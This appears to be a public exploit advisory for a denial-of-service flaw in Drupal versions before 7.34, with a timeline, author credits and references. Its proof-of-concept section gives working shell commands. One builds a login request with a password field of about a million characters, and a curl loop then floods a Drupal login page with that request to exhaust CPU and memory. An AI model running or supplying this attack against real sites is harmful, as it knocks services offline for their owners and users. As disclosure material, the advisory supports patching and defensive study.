====================================================================
DESCRIPTION:====================================================================
A vulnerability present in Drupal <7.34 allows an attacker to send
specially crafted requests resulting in CPU and memory exhaustion. This
may lead to the site becoming unavailable or unresponsive (denial of
service).====================================================================
Time Line:====================================================================
November 19,2014- A Drupal security update and the security advisory
is published.====================================================================
Proof of Concept:====================================================================
Generate a pyaload andtrywith a valid user:
echo -n "name=admin&pass="> valid_user_payload && printf "%s"{1..1000000}>> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:for i in `seq 1150`; do (curl --data @valid_user_payload
http://yoursite/drupal/?q=user --silent >/dev/null &); sleep 0.5; done
====================================================================
Authors:====================================================================-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
====================================================================
References:====================================================================* https://wordpress.org/news/2014/11/wordpress-4-0-1/* https://www.drupal.org/SA-CORE-2014-006*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
